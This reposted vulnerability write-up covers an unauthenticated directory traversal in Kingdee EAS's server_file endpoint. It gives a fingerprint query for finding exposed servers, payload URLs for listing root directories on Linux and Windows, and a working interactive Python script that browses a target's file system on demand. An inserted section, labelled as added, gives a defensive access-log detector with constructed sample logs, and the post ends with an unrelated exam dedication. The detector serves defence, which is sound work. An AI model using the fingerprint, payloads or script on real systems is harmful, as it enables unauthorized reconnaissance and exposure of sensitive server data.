Vulnerability description
The server_file endpoint of Kingdee OA (Kingdee EAS) has a directory traversal vulnerability: by supplying an arbitrary folder path, an unauthenticated requester can list server directories and obtain sensitive information about the server.
Fingerprint
app="Kingdee-EAS"
Vulnerability payload
# linux
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
# windows
/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
Reproduction

Verification PoC
import requests
import json
import optparse

# app="Kingdee-EAS"
parser = optparse.OptionParser()
parser.add_option("-u", "--url", dest="urls", action="store",
                  help="Base target uri (ex. http://target-uri/)")
options, args = parser.parse_args()
url_Kingdee = options.urls


def poc():
    # Check that the base URL is reachable before entering the interactive loop
    check = requests.get(url_Kingdee).status_code
    if check == 200:
        flag = True
        print("[+] Success connect to target")
        try:
            headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}
            while flag:
                # The folder typed at the prompt is passed straight into the folder= parameter
                cmd = input("$ ")
                if cmd == 'exit':
                    exit()
                payload = '/appmonitor/protected/selector/server_file/files?folder=' + cmd + '&suffix='
                rep = requests.get(url_Kingdee + payload, headers=headers, verify=False)
                # The endpoint answers with JSON; each entry in "rows" carries a "path" field
                resp_json = json.loads(rep.text)
                dict_json = resp_json['rows']
                for t in dict_json:
                    print(t['path'])
        except Exception:
            exit()


poc()
The verification PoC does not distinguish whether the server is Windows or Linux (mainly because I was a bit lazy); the experts can fill in the missing part themselves. It is poorly written, so go easy on me.
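From the defender's side, the request shape above is easy to spot in web server access logs. The following detection logic is an added example, not part of the original post: it parses constructed sample log lines (hypothetical IPs and timestamps) and flags requests to the server_file endpoint whose folder= value escapes a relative subdirectory, covering both the Linux (folder=/) and Windows (folder=C://) forms shown on the page as well as dot-dot traversal and URL-encoded variants.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Endpoint path taken from the page; everything else here is constructed sample data.
SERVER_FILE_PATH = "/appmonitor/protected/selector/server_file/files"

# Constructed access-log sample in common log format (hypothetical hosts, times and sizes).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2021:10:01:02 +0800] "GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1" 200 1843
10.0.0.5 - - [10/Jun/2021:10:01:09 +0800] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1" 200 912
10.0.0.7 - - [10/Jun/2021:10:02:00 +0800] "GET /appmonitor/protected/selector/server_file/files?folder=%2Fetc%2F&suffix= HTTP/1.1" 200 2210
10.0.0.9 - - [10/Jun/2021:10:03:11 +0800] "GET /appmonitor/protected/selector/server_file/files?folder=..%2F..%2F..%2F&suffix=xml HTTP/1.1" 200 400
10.0.0.9 - - [10/Jun/2021:10:04:00 +0800] "GET /appmonitor/protected/selector/server_file/files?folder=reports&suffix=xml HTTP/1.1" 200 300
10.0.0.2 - - [10/Jun/2021:10:05:00 +0800] "GET /index.jsp HTTP/1.1" 200 5000
"""

# Minimal common-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def folder_is_suspicious(folder: str) -> bool:
    """True when folder= leaves a relative subdirectory: an absolute Unix path,
    a Windows drive prefix, or a '..' path component (after URL decoding)."""
    f = unquote(folder).replace("\\", "/")  # second decode catches double-encoding
    return f.startswith("/") or re.match(r"^[A-Za-z]:", f) is not None or ".." in f.split("/")


def scan_access_log(text: str) -> list:
    """Return one alert dict per request to the server_file endpoint with a suspicious folder."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if url.path != SERVER_FILE_PATH:
            continue
        for folder in parse_qs(url.query, keep_blank_values=True).get("folder", []):
            if folder_is_suspicious(folder):
                hits.append({"ip": m["ip"], "time": m["ts"], "folder": unquote(folder),
                             "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"[!] {hit['ip']} at {hit['time']} listed folder {hit['folder']!r} (HTTP {hit['status']})")
```

A 200 response on a flagged request means the listing actually succeeded, which is the case to escalate; the same logic transfers directly to a SIEM or WAF rule keyed on the endpoint path and the folder parameter.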
Thanks for reading


Ten years of study, however bitter the dog days of summer and the depths of winter, with no regret and no complaint; when success comes, remember again the wholehearted effort, with all its hardship and its joy.
(Dedicated to the students sitting the 2021 gaokao)

This article is reposted from Redus. If you believe it infringes your rights, please send an email to contact@modb.pro to report it and provide supporting evidence; once verified, Modb (墨天轮) will remove the content immediately.